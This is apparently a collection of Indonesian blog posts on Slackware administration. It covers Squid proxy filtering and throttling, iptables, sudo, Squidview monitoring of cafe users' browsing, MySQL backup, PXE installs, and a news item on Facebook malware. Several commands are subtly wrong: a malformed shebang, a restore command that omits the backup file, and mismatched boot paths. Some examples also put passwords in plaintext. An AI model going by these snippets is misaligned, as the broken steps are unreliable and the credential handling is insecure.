minimum_object_size 4 KB

cache_dir diskd /var/log/squid/cache 20000 16 256 Q1=72 Q2=64
cache_access_log /var/log/squid/logs/access.log
cache_log /var/log/squid/logs/cache.log

acl manager proto cache_object

acl akademik src 10.0.255.0/24
acl lm src 10.1.255.0/24
acl prpam src 10.2.255.0/24
acl teknik src 10.3.255.0/24
acl kesehatan src 10.4.255.0/24

acl domain_terlarang dstdomain "/etc/squid/domain_terlarang.txt"
acl kata_terlarang url_regex -i "/etc/squid/kata_terlarang.txt"

cache_effective_group nogroup
cache_effective_user nobody

http_access deny domain_terlarang
http_access deny kata_terlarang

http_access allow akademik
http_access allow lm
http_access allow prpam
http_access allow teknik
http_access allow kesehatan

acl jamkerja time MTWHF 08:00-17:00

acl filegede url_regex -i \.exe
acl filegede url_regex -i \.mp3
acl filegede url_regex -i \.vqf
acl filegede url_regex -i \.gz
acl filegede url_regex -i \.rpm
acl filegede url_regex -i \.zip
acl filegede url_regex -i \.rar
acl filegede url_regex -i \.avi
acl filegede url_regex -i \.mpeg
acl filegede url_regex -i \.mpe
acl filegede url_regex -i \.mpg
acl filegede url_regex -i \.qt
acl filegede url_regex -i \.ram
acl filegede url_regex -i \.rm
acl filegede url_regex -i \.iso
acl filegede url_regex -i \.raw
acl filegede url_regex -i \.wav
acl filegede url_regex -i \.swf

delay_pools 1
delay_class 1 2
delay_access 1 allow jamkerja filegede
delay_access 1 deny all
delay_parameters 1 -1/-1 3000/3000

error_directory /usr/share/squid/errors/English/


Setelah itu jalankan perintah iptable untuk mengarahkan port 80 ke port 3128 :

# iptables -t nat -A PREROUTING -p tcp -s 10.0.255.0/24 --dport 80 -j REDIRECT --to-port 3128
# iptables -t nat -A PREROUTING -p tcp -s 10.1.255.0/24 --dport 80 -j REDIRECT --to-port 3128
# iptables -t nat -A PREROUTING -p tcp -s 10.2.255.0/24 --dport 80 -j REDIRECT --to-port 3128
# iptables -t nat -A PREROUTING -p tcp -s 10.3.255.0/24 --dport 80 -j REDIRECT --to-port 3128
# iptables -t nat -A PREROUTING -p tcp -s 10.4.255.0/24 --dport 80 -j REDIRECT --to-port 3128

ubah permisi squid dan menjalankannya :

# chmod +x /etc/rc.d/rc.squid
# squid -z
# /etc/rc.d/rc.squid start
# squid -k reconfigure

Selamat Mencoba...!














Tautan
Read more ...

Jumat, 30 Juli 2010

Administrasi slackware Ubuntu style

Mengadministrasi linux gaya ubuntu dengan “sudo” memberikan rasa baru dalam mengadministrasi linux. Dengan sudo kita bisa menonaktif account root atau dengan kata lain lebih mengamankan system linux kita.

Di slackware kita juga bisa membuat administrasi system bergaya ubuntu dengan sudo.
Aktifkan user yang akan digunakan dengan mengedit /etc/sudoers. Tidak disarankan untuk mengedit file tersebut menggunakan teks editor favorit tapi gunakan perintah “visudo” dari root shell atau sebagai root.
Selanjutnya tentu saja menambahkan user yang diinginkan untuk mengadministrasi linux.

Tambahkan baris berikut :
nama_user ALL=(ALL) ALL
berhubung di system saya usernya adalah arman maka saya menambahkan di /etc/sudoers seperti ini :
arman ALL=(ALL) ALL

Selanjutnya save (dengan gaya vi) yaitu tekan tombol escape dilanjutkan dengan tombol titik dua huruf w dan q atau tulisan gaya komputernya :wq

Dengan demikian telah diberikan ijin menggunakan sudo pada semua perintah – perintah, untuk hanya perintah tertentu silahkan membaca manual dari sudo.

Apakah sampai disini sudah selesai? Belum. Masih ada yang terasa janggal. Setiap kali mengetikkan perintah dengan privileges root kita harus menambahkan full prefiks yaitu /usr/sbin, /sbin, /usr/local/sbin yang bikin repot, pasalnya bisa saja kita menyangka file tersebut ada pada /usr/sbin tapi letak sebenarnya ada pada /sbin. Ini kita bisa atasi dengan menambahkan path – path root pada user yang digunakan.
Caranya dengan mengedit /etc/profile dan menambahkan path – path root, hanya saja ini berlaku untuk semua user, cara kedua adalah dengan mengcopy /etc/profile tersebut ke home direktory dengan nama “.profile” (jangan lupa tanda titiknya) dan menambahkan path root di user tersebut.

Saya menambahkan ini :
# Set the default system $PATH:
PATH="/usr/local/bin:/usr/bin:/bin:/usr/games:/usr/sbin:/sbin:/usr/local/sbin"

Sekarang hanya dengan mengetikkan nama perintah saja maka sudo akan mengeksekusinya.
Jangan kira system kita sudah sama, masih ada yang perlu kita lakukan. Yaitu auto complete perintah, sudah menjadi sebuah kenyamanan bagi pengguna konsole linux hanya dengan menekan tombol tab perintah akan di autocomplete oleh bash shell, hanya saja dengan kondisi kita sekarang ini autocomplete bash hanya sebatas pada perintah awal dan file atau direktori, sedangkan parameter tidak. Sialnya setiap kali kita mengetikkan sudo kita harus menambahkan perintah yang akan di eksekusi tapi tidak bisa autocomplete :((.

Tenang jangan ngambek dulu, again and again and again, bukan slackers namanya kalau gampang nyerah, jika distro lain bisa berarti kita juga bisa :D, it's all about costumize.
Untuk membuat bash melakukan auto complete pada perintah setelah sudo kita membutuhkan sebuah paket “bash-completion”, ada di CD 3 direktori extra. Kalau tidak ketemu cari saja di internet hihihi ;)) gitu aja kok repot.

Selanjutnya adalah tentu saja menginstall paket tersebut :
# upgradepkg –install-new bash-completion-20060301-noarch-1.tgz

Terakhir, eksekusi file /etc/bash_completion
sh /etc/bash_completion

Dan rasakan system administrasi linux ubuntu style.

Sumber : http://makassar-slackers.org/Administrasi%20slackware%20Ubuntu%20style

Regards
Arman
Read more ...

Jumat, 09 Juli 2010

Cara Mengganti Link Read More Dengan Gambar

Berikut ini langkah-langkah Cara mengganti link read more dengan gambar

  • Langkah 1
Login ke akun Blogger milik anda > ata Letak > Edit HTML. Klik Download Full Template untuk membackup template blog Anda.

Beri tanda centang pada “Expand widget template” kemudian cari kode berikut ini
<b:if cond='data:blog.pageType != &quot;item&quot;'&gt;
<div expr:id='"summary" + data:post.id'><data:post.body/></div>
<script type='text/javascript'>createSummaryAndThumb("summary<data:post.id/>");</script>
<span class='rmlink' style='float:left'><a expr:href='data:post.url'>READ MORE</a></span>
</b:if>
<b:if cond='data:blog.pageType == &quot;item&quot;'><data:post.body/></b:if>

Ganti kode yang berwarna orange dengan kode ini
<a expr:href='data:post.url'><img src=' URL gambar Read More blog Anda '/></a>

  • Langlah 2
Klik Pratinjau. Bagaimana hasilnya? Jika berhasil, klik tombol TERBITKAN ENTRI.
Read more ...

Downloads Packages

Read more ...

Sejarah Linux Slackware

Slackware
Slackware merupakan sistem operasi yang dibuat oleh Patrick Volkerding dari Slackware Linux, Inc. Slackware merupakan salah satu distro awal, dan merupakan yang tertua yang masih dikelola. Tujuan utama Slackware adalah stabilitas dan kemudahan desain, serta menjadi distribusi Linux yang paling mirip Unix.

1.Nama
Nama “Slackware” berasal dari fakta bahwa distribusi ini dimulai sebagai sebuah proyek pihak swasta tanpa komitmen apa-apa. Untuk mencegah proyek ini menjadi terlalu serius pada awalnya, Volkerding memberi nama yang lucu itu, yang kemudian tetap bertahan bahkan setelah Slackware menjadi proyek serius.Kata “Slack” (kendor) di Slackware merujuk pada istilah “Slack” seperti yang digunakan oleh Gereja para SubGenius.

2.Sejarah
Slackware pada awalnya keturunan dari Softlanding Linux System, yang paling populer dari distribusi Linux asli. SLS mendominasi pasar sampai para pengembang membuat keputusan untuk mengganti format executable-nya dari a.out ke ELF. Ini bukan keputusan yang populer di kalangan basis pengguna SLS pada saat itu. Patrick Volkerding meluncurkan versi modifikasi dari SLS, yang dia beri nama Slackware.Rilis pertama Slackware, 1.00, diluncurkan pada tanggal 16 Juli 1993. Berupa sebuah citra 3½” floppy disk yang tersedia melalui FTP.

Pada tahun 1999, Slackware berkali-kali dirilis, mulai dari rilis nomor 4 sampai 7. Hal ini dijelaskan oleh Patrick Volkerding sebagai upaya pemasaran untuk menunjukkan bahwa Slackware adalah sebuah distro Linux yang up-to-date sebagaimana distro-distro lainnya, yang kala itu banyak yang telah melepas nomor 6 (seperti Red Hat yang merilis setiap revisi dari distribusinya dengan kenaikan dari 4.1 ke 5.0 bukan 3.1 ke 3.2 sebagaimana Slackware).Slackware memang memiliki beberapa rilis Beta dalam rentang 6.x, tetapi hal ini tidak dihitung sebagai rilis resmi.

Pada tahun 2005, lingkungan desktop GNOME telah dihapus dari rilis yang akan diluncurkan, dan diserahkan kepada dukungan komunitasnya.Penyingkiran GNOME dianggap oleh sebagian komunitas Linux sebagai tindakan yang menggemparkan karena lingkungan desktop tersebut banyak digunakan di distro-distro Linux. Sebagai balasan, beberapa proyek berbasis komunitas mulai menawarkan distribusi GNOME lengkap untuk Slackware.
Read more ...

Video Instalasi Linux Slackware

Read more ...

Awasi Akses Internet di Warnet dengan Squidview

Bismillah.
Cerita : Layaknya sebuah layanan umum, maka sudah barang tentu ada pihak yg berkewajiban untuk mengatur lalu-lintas layanan tersebut. Bilamana hal ini diabaikan, maka ada satu saat dimana lalu-lintas layanan akan mengalami kerusakan atau gangguan. Demikian juga layanan akses internet.

Secara privasi -atau kepentingan pribadi- mungkin saja hal ini dianggap bertentangan, karena seakan-akan kita mengintip rahasia pengguna. Tetapi dari sisi norma bangsa, agama, budaya, maka kepentingan untuk mengetahui situs apa saja yg diakses oleh pengguna, menjadi sebuah alasan pembenaran. Baiklah kita tidak akan berpanjang-lebar tentang hal tersebut diatas, karena dalam pelaksanaan “toh” sepenuhnya bergantung pada sang admin warnet. Apakah ia akan mengawasi akses pengguna ataupun tidak ?

Catatan : Kita sudah memasang squid di server dg konfigurasi transparent

Langkah-langkah :


A. Memasang dan mengatur konfigurasi Squidview

1).Instalasi aplikasi Squidview -penulis menggunakan versi 0.7-. Silakan unduh disini squidview nya.
#installpkg squidview-0.70-i386-1.tgz

2).Jalankan untuk pertama-kalinya sebagai user.
$squidview (menjalankan via terminal)
Aplikasi ini membutuhkan terminal. Bila kita menginginkan untuk berjalan di xwindow maka jalankan via xterm. Shortcut -pintasan- nya adalah sbb :
$xterm -e squidview

3).Silakan akhiri dengan menekan kombinasi tombol Ctrl-X

4).Dengan langkah ke-3, maka ada sub-dir .squidview di /home/user

a) Selanjutnya kita akan melakukan edit beberapa file didalamnya. Gunakan editor favorit anda.
$vi .squidview/aliases (atau)
$mc -e .squidview/aliases

b) Isi file tersebut dengan nama alias dari PC client. Contoh :
ilho 192.168.0.1
rusdin 192.168.0.2
wawan 192.168.0.3
sigit 192.168.0.4


c) Arahkan log.1, log.2, log.3 ke file log milik squid.
$ln -s /var/lib/squid/logs/access.log log.1
$ln -s /var/lib/squid/logs/access.log log.2
$ln -s /var/lib/squid/logs/access.log log.3


d) Konfigurasi selesai, tinggal memastikan bahwa file log squid tersebut boleh dibaca oleh user. Sebagai root, kita membuat script dgn urutan command berikut :
#cd /etc/cron/monthly
#touch awasi-squid
#vi awasi-squid
(atau) #mc -e awasi-squid

Isikan command berikut :
#/bin/sh
squid -k rotate
chmod 644 /var/lib/squid/logs/access.log

Silakan script tersebut disimpan, lalu jalankan untuk pertama-kali
#/etc/cron.monthly/awasi-squid

B. Menggunakan squidview
1). Jalankan sebagai user.
$squidview (menjalankan via terminal)
Atau dengan xwindow, jalankan via xterm. Shortcut -pintasan- nya adalah sbb :
$xterm -e squidview

2). Squidview otomatis akan memonitor terus kegiatan akses via squid. Bila sudah penuh satu layar, maka bacaan log akan digulung. Untuk operasional nya, silakan simak langkah 3 s/d 6 di bawah ini ...

3). Bila kita ingin menghentikan monitor sementara waktu, tinggal tekan tombol “m”. Hal ini diperlukan untuk dapat membaca log squid secara seksama baris-per-baris, tanpa gangguan layar log yg menggulung. Selanjutnya kita gunakan tombol panah naik-turun untuk memperhatikan log nya. Untuk aktifkan monitor kembali, tekan tombol “m” lagi.

4). Bila kita ingin membaca lengkap baris log, sila tekan tombol “v”. Untuk keluar, tekan tombol “q”.

5). Bila kita ingin mencari info akses, kita bisa gunakan kata kunci. Tekan tombol “f”, lalu ketik kata kunci yg dicari, lalu tekan tombol panah kanan (untuk situs sebelumnya) atau kiri (untuk situs sesudahnya).

6). Bila kita ingin bantuan command, tinggal tekan tombol “h”. Untuk keluar dari bantuan, tekan tombol “q”. Untuk keluar dari squidview, tekan kombinasi tombol “Ctrl-X”.

Oke, selamat mengawasi User

Sumber : slackycml
Read more ...

CSV to mySQL on Slackware

load data infile '/path/dimana/file/csv/disimpan' into table nama_tabel;
Read more ...

Mengubah Nama Tabel di Mysql

Perintah :

ALTER TABLE [nama_tabel_lama] RENAME TO [nama_tabel_baru] ;

Example :

ALTER TABLE bps_prt_bantaeng_07 RENAME TO pbs_prt_bantaeng;
Read more ...

Backup n Restore Database MySQL on Slackware

Backup Database

Sysntax :

mysqldump --add-drop-table -u user --password=mypassword database> backup.sql

Keterangan :

user = username komputer
mypassword = password myslql
database = nama database
backup.sql = nama file backup (terserah asalkan jangan sampai lupa menambahkan extensi ".sql"

Example :

mysqldump --add-drop-table -u ilham --password=keuangan keuangan_daerah> backup.sql

Restore Database

Syntax :

mysql -u user -p -Ddatabase --password=mypassword

Keterangan :

user = username komputer
mypassword = password myslql
database = nama database
backup.sql = nama file backup (terserah asalkan jangan sampai lupa menambahkan extensi ".sql"

Example :

mysql -u ilham -p keuangan_daerah --password=keuangan
Read more ...

Install Proxy Server Squid di Linux Slackware

Berikut ini adalah langkah-langkah yang saya lakukan untuk melakukan instalasi proxy server squid:

1. Login sebagai root.

2. Buat direktori /opt/pkg/squid. Direktori ini saya tujukan untuk menyimpan instalasi proxy server squid.

3. Download Paket squid. Fyi, Paket yang saya gunakan saat melakukan instalasi dalam tutorial ini adalah squid-3.0.STABLE20.tar.bz2

4. Ekstrak paket tersebut dengan perintah:

tar xvvjf squid-3.0.STABLE20.tar.bz2

5. Masuk ke direktori squid-3.0.STABLE20:

cd squid-3.0.STABLE20

6. Jalankan configure:

./configure --prefix=/opt/pkg/squid

7. Kemudian dilanjutkan dengan melakukan kompilasi:

make all

8. Langkah terakhir adalah menjalankan perintah:

make install

9. Untuk menjalankan Cache pada squid yang telah terinstall, edit konfigurasi file-nya di:

/opt/pkg/squid/etc/squid.conf

sumber : http://kuntoaji.blogspot.com/2008/12/install-proxy-server-squid-di-linux.html
Read more ...

Simple Squid Configuration Example

Squid
Squid berfungsi sebagai proxy. Salah satu tugas proxy adalah melakukan cache halaman web. Dengan begitu, jika ada client yang melakukan request ke internet, maka yang diakses adalah cache dari proxy tersebut yang berada pada jaringan lokal. Jika tidak ada, maka proxy akan melakukan koneksi ke Internet. Dengan begitu, akan membuat akses ke internet menjadi lebih sedikit dan membuat kita lebih cepat membuka halaman web. Misal, pada saat yang bersamaan ada 10 orang yang ingin mengakses google.com, jika kita memiliki proxy yang telah melakukan cache halaman web google, maka 10 orang tersebut cukup mengakses proxy yang berada pada jaringan lokal. Jika tidak memiliki proxy, maka 10 orang tersebut harus terkoneksi ke internet secara langsung sehingga membuat jaringan menjadi lebih padat.acl manager proto cache_object


Konfigurasi Squid

Untuk membangun server squid, file konfigurasi dari squid dapat ditemukan pada /etc/squid.conf. Untuk melakukan konfigurasi Squid, sangat tergantung topologi jaringan anda. Berikut ini adalah contoh konfigurasi Squid milik server linux slackware saya yang terhubung proxy yang lain untuk terkoneksi ke internet.

acl localhost src 127.0.0.1/32
acl to_localhost dst 127.0.0.0/8

acl localnet src 10.0.0.0/8 # RFC1918 possible internal network
acl localnet src 172.16.0.0/12 # RFC1918 possible internal network
acl localnet src 192.168.0.0/16 # RFC1918 possible internal network
acl lab src 10.14.10.0/24 #tambahan dari saya

acl SSL_ports port 443
acl Safe_ports port 80 # http
acl Safe_ports port 21 # ftp
acl Safe_ports port 443 # https
acl Safe_ports port 70 # gopher
acl Safe_ports port 210 # wais
acl Safe_ports port 1025-65535 # unregistered ports
acl Safe_ports port 280 # http-mgmt
acl Safe_ports port 488 # gss-http
acl Safe_ports port 591 # filemaker
acl Safe_ports port 777 # multiling http
acl CONNECT method CONNECT

http_access allow manager localhost
http_access deny manager
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access allow localnet
http_access allow lab
icp_access allow localnet
icp_access allow lab
icp_access deny all

htcp_access allow localnet
htcp_access allow lab
htcp_access deny all
http_port 7070

cache_peer 172.16.1.1 parent 8080 0 no-query proxy-only
access_log /opt/pkg/squid//var/logs/access.log squid

refresh_pattern ^ftp: 1440 20% 10080
refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern (cgi-bin|\?) 0 0% 0
refresh_pattern . 0 20% 4320

connect_timeout 3 minute
peer_connect_timeout 30 seconds
request_timeout 3 minutes
client_lifetime 1 day

cache_effective_user squid
cache_effective_user squid
visible_hostname aji.slacky.id-^-akulahaji.blogspot.com

dns_retransmit_interval 15 seconds
dns_timeout 5 minutes
dns_nameservers 10.14.203.7
cachemgr_passwd mypassword shutdown

client_db on
refresh_all_ims off
retry_on_error on
uri_whitespace strip

coredump_dir /opt/pkg/squid//var/cache
high_memory_warning 1 KB

Setelah konfigurasi selesai, jalankan perintah berikut untuk mengecek konfigurasi server squid:

squid -k parse

Kemudian jalankan perintah berikut untuk tidak melakukan inisialisasi server squid:

squid -z

Jika suatu saat anda melakukan konfigurasi ulang konfigurasi squid, jalankan perintah berikut untuk meng-update server squid:

squid -k reconfigure

update:

Maaf, karena terlalu banyak, saya tidak menyertakan keterangan terhadap konfigurasi squid. Keterangan dapat dibaca pada file squid.conf

sumber : kuntoaji.blogspot.com
Read more ...

Contoh Firewall iptables

Menghapus rule iptables
# iptables -t nat -F

Eneble IP Forwarding
# echo 1 > /proc/sys/net/ipv4/ip_forward

Enable IP Masquerade
# iptables -t nat -A POSTROUTING -s 192.168.5.0/24 -o eth1 -j MASQUERADE

iptables REDIRECT to localhost
# iptables -t nat -A PREROUTING -p tcp --dport 80 -i eth2 -j DNAT --to 192.168.5.1
Read more ...

Install Slackware/Linux Via NFS dan Network Booting

Kebutuhan pada sisi server:

  • servis yang mengerti dan menangani protocol BOOTP, dislackware, kita bisa memanfaatkan dhcpd.
  • servis untuk menangani pengunduhan (download) kode bootstrap oleh client (TFTP server). Slackware sudah disertakan tftp server.
  • NFS server. ini juga udah disediain ama slackware

  • Jadi sebutulnya udah gak butuh apa di server, cukup slackware distro aja (gw make versi 13.0).

    Kebutuhan pada sisi client:

  • Kartu jaringan dengan firmware PXE
  • Bios yang bolehin booting dengan kartu jaringan

  • Nah sekarang tinggal setting server dhcp, tftp, dan NFS di sisi server serta menyiapkan file-file yang dibutuhkan untukk booting dan install slackware di sisi client. tapi sebelumnya, supaya gampang baca tulisan setelah ini, saya kasih asumsi:

  • IP pada jaringan berada antara 192.168.0.1 sampai 192.168.0.254
  • semua server ada di laptop Gw, dan memiliki alamat IP 192.168.0.1
  • DNS domainnya, gw pake “my.lan”
  • Direktori penyimpanan file-file paket slackware di “/mirror/slackware”
  • Direktori penyimpanan file-file yang dibutuhkan untuk booting untuk TFTP server di /tftpboot/slackware-13.0


  • Setting DHCP server

    Untuk menyetting DHCP server, diperlukan perubahan pada file /etc/dhcpd.conf. untuk mempermudahnya sya langsung salin dhcpd.conf di README_PXE.TXT ke direktori /etc. saya menggunakan sample pertama (karena tidak ada client selain yang akan diinstall):

    # dhcpd.conf
    #
    # Configuration file for ISC dhcpd
    #
    # If this DHCP server is the official DHCP server for the local
    # network, the authoritative directive should be uncommented.
    authoritative;
    ddns-update-style none;

    # Allow bootp requests

    allow bootp;

    # Point to the TFTP server:
    next-server 192.168.0.1;

    # Default lease is 1 week (604800 sec.)
    default-lease-time 604800;
    # Max lease is 4 weeks (2419200 sec.)
    max-lease-time 2419200;

    subnet 192.168.0.0 netmask 255.255.255.0 {
    option domain-name "my.lan";
    option broadcast-address 192.168.0.255;
    option subnet-mask 255.255.255.0;
    option domain-name-servers 192.168.0.1;
    option routers 192.168.0.10;
    range dynamic-bootp 192.168.0.50 192.168.0.100;
    use-host-decl-names on;
    if substring (option vendor-class-identifier, 0, 9) = "PXEClient" {
    filename "/slackware-12.0/pxelinux.0";
    }

    }

    Penjelasan :

    # Allow bootp requests
    allow bootp;

    Dibutuhkan untuk menangani protocol BOOTP (booting via network)

    if substring (option vendor-class-identifier, 0, 9) = "PXEClient" {
    filename "/slackware-13.0/pxelinux.0";}

    Dibutuhkan untuk menentukan letak file yang dibutuhkan untuk booting (/slackware-13.0/pxelinux.0)

    Setting TFTP server

    Untuk meload daemon TFTP dan menentukan tftp_root ke /tftpboot diperlukan untuk meng-uncomment seting tftp pada file /etc/inetd.conf, yaitu baris

    tftp dgram udp wait root /usr/sbin/in.tftpd in.tftpd -v -s /tftpboot -r blksize

    dan me-restart rc.inetd

    sh /etc/rc.d/rc.inetd restart

    Setting NFS server

    untuk men-share folder dengan NFS kita perlu menambahkan baris pada file /etc/exports.

    /mirror/slackware 192.168.0.0/24(ro,sync,insecure,all_squash)

    dan merestart rc.nfsd

    sh /etc/rc.d/rc.nfsd restart

    Setting File-file PXELinux

    Agar Client bisa booting maka diperlukan beberapa file. File-file itu telah disertakan pada cd installan slackware dan untuk file pxelinuxnya bisa diambil di /usr/lib/syslinux/pxelinux.0, cukup salin file-file itu ke direktori tftp root (/tftpboot).

    cp /usr/lib/syslinux/pxelinux.0 /tftpboot/slackware-13.0/
    cp /mirror/slackware/isolinux/message.txt /tftpboot/slackware-13.0/
    cp /mirror/slackware/isolinux/f2.txt /tftpboot/slackware-13.0/
    cp /mirror/slackware/usb-and-pxe-installers/initrd.img /tftpboot/slackware-13.0/
    cp /mirror/slackware/usb-and-pxe-installers/pxelinux.cfg_default /tftpboot/slackware-13.0/pxelinux.cfg/default
    cp -a /mirror/slackware/kernels /tftpboot/slackware-13.0/

    Kalo udah, kita bisa mulai….
    Memulai booting via network. Pada intinya, tinggal booting dengan network dari
    client. Tapi setiap PC/laptop caranya berbeda-beda. Secara garis besar, yang perlu dilakukan adalah meng-enable pilihan booting dari network (biasanya ada di bios) dan memilih booting pertama kali dari network (bisa ditentukan dari urutan boot priority di bios atau shrtcut tertentu). Pada laptop temen saya, saya cukup booting seperti biasa, lalu tekan CTRL+[kursor kanan] lalu pilih booting dari network, dan pilih PXE (di dynabook di perbolehkan menggunakan PXE ataupun EPX)

    setelah bisa login… load module kartu jaringannya. Cukup jalankan perintah “network”, kalo gak kedetect (gak berhasil kedetect) maaf sekali… anda belum beruntung.

    Kalo sudah ke load, kartu jaringannya, kita lakukan install slackware seprti biasa…. ketik “setup”.
    Saat diminta menetukan source installan maka pilih NFS dan settingannya:

    IP anda : 192.168.0.111 (apaan aja deh)
    netmask: 255.255.255.0
    gateway: 192.168.0.10
    NFS server: 192.168.0.1
    direktori Slackware di NFS server: /mirror/slackware

    tinggal pilih paket-paket yang mau diinstall, dan setting-setting yang diperluin.

    Sebetul sampai sini dah selesai, tapi ternyata gw punya masalah baru, LILO nya gak bisa keinstall. Tapi masalah ini sudah bisa saya selesaikan, tapi WinXP temen saya gak bisa boot lagi.

    untuk masalah kedua saya sedang mengusahakan, kemungkinan menggunakan PXE juga untuk re-install windows (biar bisa repair), dan akan saya posting lagi lain waktu (dah kepanjangan sih… ini aja setengah hari ngetiknya) termasuk masalah menginstal LILO. Kedua masalah ini muncul karena kesalahan teman saya menyiapkan partisi harddisknya… udah ah… nanti aja lanjutin lagi, dah cape nih.

    Read more ...

    Mengatur Jam Server di Linux

    Tips singkat cara mengupdate jam di Linux Anda. Bisa menggunakan perintah date, atau jika terhubung ke Internet bisa disingkronkan dengan NTP server.

    Ubah Manual

    Dengan menggunakan perintah date, Anda bisa mengubah jam server. Caranya ketik perintah date lalu diikuti dengan bulan tanggal jam dan menit (format MMDDhhmm).

    Contoh, ingin mengubah jam server Anda menjadi bulan 11 Juli, jam 16:30. MM kita isi dengan 07 (bulan ke tujuh), DD kita isi dengan 11 (tanggal 11), dan hh kita isi dengan 16 (jam 16), dan mm kita isi dengan 30 (menit ke 30).

    date 07111630


    Bagaimana kalau beda jamnya sampai beda tahun? Sama seperti tadi, cuma diujung tambahkan dua digit tahun. ketikkan date lalu diikuti MMDDhhmmYY.

    Misal, kita ingin mengubah jadi 11 Juli 2009, jam 16:30

    date 0711163009

    Mensinkronkan dengan NTP server

    Jika server Anda terkoneksi ke Internet, cara paling mudah adalah dengan mensinkronkan dengan NTP server. Instal terlebih dahulu paket ntpdate.

    apt-get install ntpdate

    Setelah itu sinkronkan dengan NTP server yang Anda pilih. Misal,

    ntpdate id.pool.ntp.org

    Jam server selalu telat 7 jam setelah server di restart

    Kemungkinan besar, Anda menset jam di linux ke GMT. Sehingga saat di restart jam BIOS terset ke waktu GMT, jika Anda berada di daerah waktu Indonesia bagian barat, jam Anda berbeda 7 jam dengan jam di GMT.

    Di Ubuntu, coba sunting berkas /etc/default/rcS.

    Cari baris

    UTC=yes

    Lalu ganti menjadi

    UTC=no

    sumber : ngadimin.com

    Read more ...

    Waspadalah, 2010 Virus Facebook Kian Marak

    JAKARTA (Arrahmah.com) – Setidaknya ada dua virus yang mengancam pengguna Facebook di Indonesia. Pengguna disarankan hati-hati, karena serangan virus dengan modus operandi mengeksploitasi Facebok akan makin marak di masa datang.

    Perusahaan antivirus Vaksincom mencermati, saat ini setidaknya ada dua virus yang mengancam pengguna Facebook. Virus itu bukan menyebar di Facebook, tapi memanfaatkan jejaring sosial popular itu untuk menjaring korban dan bertujuan mendapatkan akun FB.

    “Menurut hemat kami, di tahun ini serangan virus dengan modus operandi mengeksploitasi FB akan makin marak seiring makin populernya FB,” kata CEO Vaksincom Alfons Tanuwijaya, di Jakarta.

    Ia menambahkan di dunia virus berlaku hukum pembuat virus akan mengincar sistem operasi atau aplikasi yang paling popular. Hal itu karena korban potensialnya lebih besar.

    Oleh karena itu komputer dengan sistem operasi Microsoft Windows lebih menarik dibuat virusnya dibandingkan Mac OS Leopard atau Linux, karena penggunannya paling banyak. Sementara sistem operasi Windows Mobile atau BlackBerry lebih sedikit mendapat serangan, karena secara de facto market ponsel masih dikuasai oleh sistem operasi Symbian.

    “Saat ini dua virus yang cukup berbahaya dalam mengeksploitasi FB adalah Bredolab dan Zbot,” kata Alfons.

    Bredolab merupakan virus lama yang menyebarkan diri sebagai lampiran e-mail. Sebelumnya, virus ini seolah-olah datang dari DHL. Jika dijalankan, maka virus akan menyebabkan komputer terinfeksi.

    Memanfaatkan Facebook yang popular, pembuat virus mengubah e-mail seakan-akan dari administrator Facebook. Pembuat virus meminta password reset Facebook dan menjalankan satu aplikasi yang isinya program berbahaya.

    “Jika aplikasi itu dijalankan, maka korbannya akan dibuat pusing tujuh keliling. Selain menginfeksi komputer korbannya, virus juga akan meng-download spyware, scareware berupa antivirus palsu, dan menginfeksi lagi komputer korbannya,” kata Alfons.

    Tidak cukup melakukan hal ini, Bredolab juga akan melakukan spam dari komputer korbannya. Akibatnya IP address komputer korban bisa diblok oleh perusahaan blacklist, karena mengirimkan spam dan mengganggu pengiriman e-mail.

    Sedangkan cara penginfeksian virus Zbot lebih canggih. Virus ini tidak mengirimkan diri sebagai lampiran e-mail seperti Bredolab, yang bisa diblok oleh mailserver.

    Virus itu menyebar melalui email phishing, seakan-akan pesan resmi dari Facebook untuk mengubah password. Jika link tersebut diklik, maka ia akan menampilkan situs palsu Facebook yang meminta korbannya memasukkan username dan password.

    Jika dituruti maka username dan password pengguna Facebook akan diketahui oleh pembuat virus. Tidak cukup mencuri password Facebook korbannya, virus ini juga akan memberikan link ke file untuk diunduh yang dikatakan sebagai file update dari Facebook. Jika dijalankan, maka virus akan menginfeksi komputer korbannya dan mengakibatkan komputer itu mengirimkan spam.

    Lalu bahaya terbesar apa yang bisa dialami user?

    Alfons mengatakan tingkat bahaya tergantung dari korbannya. Korban bisa kehilangan akun Facebook dan jika ada nilai ekonomis di akun itu, misalnya data rahasia rekening perbankan maka akan bisa berpindah tangan.

    “Selain itu yang perlu dikhawatirkan adalah bahaya jaringan komputer kantor yang menjadi korban virus ini. Jika komputer mengirimkan spam, maka IP kantor akan di-blacklist sehingga tidak akan bisa mengirimkan email dengan baik, dan seluruh email kantor tersebut akan masuk ke dalam kategori spam. Potensi kerugian ekonominya sangat besar,” ujar Alfons.

    Untuk menghindari virus di Facebook, Alfons mengatakan pengguna komputer harus menggunakan program antivirus yang ter-update. Selain itu ia menyarankan pengguna komputer selalu waspada terhadap pemalsuan situs atau webforging.

    “Jangan mudah percaya link yang diberikan. Khususnya pada saat memasukkan data penting seperti username dan password, sebaiknya perhatikan situs yang dikunjungi dengan seksama,” timpalnya. [inilah.com/arrahmah.com]

    sumber : http://www.arrahmah.com
    Read more ...

    Logical Volume Manager (LVM) dan contoh real penggunaannya

    Artikel ini ditulis berdasarkan pengalaman penulis karena kehabisan space di partisi /home. Dengan menggunakan LVM (Logical Volume Manager) maka kita dapat menggabungkan partisi lainnya ke dalam partisi /home untuk memperbesarnya. Sebelumnya, mari kita bahas dulu mengenai LVM. LVM adalah singkatan dari Logical Volume Manager. Dengan LVM ini pengaturan space dan partisi dalam harddisk menjadi lebih dari sekedar pengertian tradisional device dan partisi yang biasa kita ketahui selama ini. Secara tradisional, kita mengenal harddisk dari device namenya yaitu /dev/hda, /dev/hdb dstnya utk harddisk IDE dan /dev/sda, /dev/sdb dstnya untuk SCSI, dan partisi2nya seperti /dev/hda1, /dev/hda2, /dev/sda1, /dev/sda2 dstnya.
    Tentu ada yang bertanya memangnya apa salahnya dengan pembagian partisi secara tradisional ini? Well, pernah bertanya2 bagaimana schema partisi yang sebaiknya kita pakai di Linux? Tidak jarang pertanyaan ini dijawab dengan kata2 "Pembagian partisi Linux lebih merupakan seni dan pengalaman daripada ilmu pasti". Mengapa begitu? Sebab kalau kita sampai salah mempartisi, dan kemudian ternyata partisi tersebut habis spacenya, maka akan cukup sulit dan memakan waktu untuk membetulkannya.

